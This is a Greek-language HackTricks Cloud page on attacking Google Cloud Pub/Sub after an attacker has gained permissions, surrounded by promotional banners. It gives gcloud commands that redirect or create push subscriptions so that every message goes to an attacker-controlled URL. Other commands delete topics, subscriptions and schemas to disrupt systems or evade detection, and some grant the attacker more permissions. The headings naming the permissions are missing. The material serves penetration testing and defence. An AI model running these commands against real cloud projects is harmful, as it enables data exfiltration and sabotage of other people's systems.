Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)!
Άλλοι τρόποι υποστήριξης των HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στα HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Για περισσότερες πληροφορίες σχετικά με το Pub/Sub ελέγξτε την ακόλουθη σελίδα:
{% content-ref url="../gcp-services/gcp-pub-sub.md" %} gcp-pub-sub.md {% endcontent-ref %}
Δημοσίευση ενός μηνύματος σε ένα θέμα, χρήσιμο για αποστολή απροσδόκητων δεδομένων και ενεργοποίηση μη αναμενόμενων λειτουργιών ή εκμετάλλευση ευπαθειών:
# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"
Χρήσιμο για να αποτρέψετε μια συνδρομή από το να λαμβάνει μηνύματα, ίσως για να αποφύγετε την ανίχνευση.
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
Χρήσιμο για να αποτρέψετε μια συνδρομή από το να λαμβάνει μηνύματα, ίσως για να αποφύγετε την ανίχνευση.
Είναι δυνατόν να διαγράψετε ένα θέμα ακόμη και με συνδρομές που είναι συνδεδεμένες σε αυτό.
gcloud pubsub topics delete <TOPIC NAME>
Χρησιμοποιήστε αυτήν την άδεια για να ενημερώσετε κάποια ρύθμιση του θέματος για να το διαταράξετε, όπως --clear-schema-settings
, --message-retention-duration
, --message-storage-policy-allowed-regions
, --schema
, --schema-project
, --topic-encryption-key
...
Δώστε στον εαυτό σας άδεια να εκτελέσετε οποιαδήποτε από τις προηγούμενες επιθέσεις.
Λάβετε όλα τα μηνύματα σε έναν διακομιστή web:
{% code overflow="wrap" %}
# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
{% endcode %}
Δημιουργήστε ένα συνδρομή και χρησιμοποιήστε το για ανάκτηση μηνυμάτων:
# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted
Διαγραφή ενός συνδρομητή μπορεί να είναι χρήσιμο για να διαταράξετε ένα σύστημα επεξεργασίας καταγραφών ή κάτι παρόμοιο:
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
Χρησιμοποιήστε αυτήν την άδεια για να ενημερώσετε κάποια ρύθμιση έτσι ώστε τα μηνύματα να αποθηκεύονται σε ένα μέρος στο οποίο μπορείτε να έχετε πρόσβαση (URL, πίνακας Big Query, Bucket) ή απλά για να το διαταράξετε.
{% code overflow="wrap" %}
gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
{% endcode %}
Δώστε στον εαυτό σας τις άδειες που χρειάζονται για να εκτελέσετε οποιαδήποτε από τις προηγούμενα σχολιασμένες επιθέσεις.
Επιτεθείτε σε ένα σχήμα σε ένα θέμα έτσι ώστε τα μηνύματα να μην το πληρούν και συνεπώς το θέμα να διαταράσσεται.
Αν δεν υπάρχουν κάποια σχήματα, ενδέχεται να χρειαστεί να δημιουργήσετε ένα.
{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}
{% endcode %}
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json
Αυτό μπορεί να μοιάζει με τη διαγραφή ενός σχήματος ώστε να μπορείτε να στείλετε μηνύματα που δεν συμμορφώνονται με το σχήμα. Ωστόσο, καθώς το σχήμα θα διαγραφεί, κανένα μήνυμα δεν θα εισέλθει πραγματικά στο θέμα. Έτσι αυτό είναι ΑΝΕΠΙΤΥΧΕΣ:
gcloud pubsub schemas delete <SCHEMA NAME>
Δώστε στον εαυτό σας τα δικαιώματα που χρειάζονται για να εκτελέσετε οποιαδήποτε από τις προηγούμενα σχολιασμένες επιθέσεις.
Αυτό θα δημιουργήσει ένα στιγμιότυπο όλων των μη επιβεβαιωμένων μηνυμάτων και θα τα επαναφέρει στη συνδρομή. Δεν είναι πολύ χρήσιμο για έναν εισβολέα, αλλά εδώ είναι:
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME
Μάθετε AWS χάκινγκ από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team του HackTricks AWS)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του GitHub.